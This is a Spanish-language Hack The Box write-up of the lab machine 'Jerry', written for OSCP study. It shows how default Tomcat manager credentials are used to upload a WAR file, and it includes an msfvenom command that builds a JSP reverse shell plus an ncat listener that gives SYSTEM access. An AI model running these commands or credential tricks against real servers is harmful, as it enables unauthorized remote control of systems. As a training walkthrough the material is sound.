Hack the Box es una plataforma en línea para probar y mejorar tus habilidades en pruebas de penetración y ciberseguridad.
En esta serie de artículos mostraremos cómo los evaluadores junior completan algunas máquinas de Hack The Box en su camino hacia OSCP, una certificación muy conocida, respetada y requerida para muchos puestos de ciberseguridad. Los certificados OSCP son capaces de identificar las vulnerabilidades existentes y ejecutar ataques organizados de manera controlada. Pueden aprovechar o modificar el código de exploits existentes en su beneficio, realizar pivoting en la red y exfiltrar datos, y comprometer los sistemas debido a configuraciones deficientes.
¡Empecemos con la diversión!
Jerry
Initial Foothold
Al enumerar la página web en el puerto 8080
nos encontramos con http://10.10.10.95:8080/manager/status
.
Pide autenticación y si hacemos clic en cancelar
, recibimos un 401
(no autorizado).
Sin embargo, el mensaje da un ejemplo de cómo añadir credenciales a la configuración del Tomcat:
tomcat:s3cret
. Resulta que esas son credenciales realmente válidas para entrar en esa misma página.
401 mensaje (truncated)
Si no ha cambiado ningún archivo de configuración, por favor examine el archivo conf/tomcat-users.xml en su instalación. Ese archivo debe contener las credenciales para permitirle usar esta aplicación web.
Por ejemplo, para añadir el rol de admin-gui a un usuario llamado tomcat con una contraseña de s3cret, añada lo siguiente al archivo de configuración que aparece arriba.
Así que nos las arreglamos para acceder al estado del servidor. Tiene un montón de información:
- Apache Tomcat Versión
7.0.88
. - Nombre del OS:
Servidor Windows 2012 R2
. - Arquitectura del Os:
amd64
. - Versión de Os:
6.3
. - Versión de la JVM:
1.8.0_171-b11
. - Nombre de host:
JERRY
.
Root
Si ahora vamos a http://jerry:8080/manager/html/list
, encontramos que podemos subir archivos de WAR
. Tal vez
podemos explotar esto de alguna manera.
Sí, podemos, siguiendo este blog.
- Generar payload:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.17 LPORT=6969 -f war > shell.war
. - Configurar el puerto escucha:
ncat -lnvp 6969
. - Sube el archivo
shell.war
. - Nuestro archivo debería aparecer ahora en la lista, haga clic en el nombre.
Hemos creado con éxito un shell como nt authority\system
.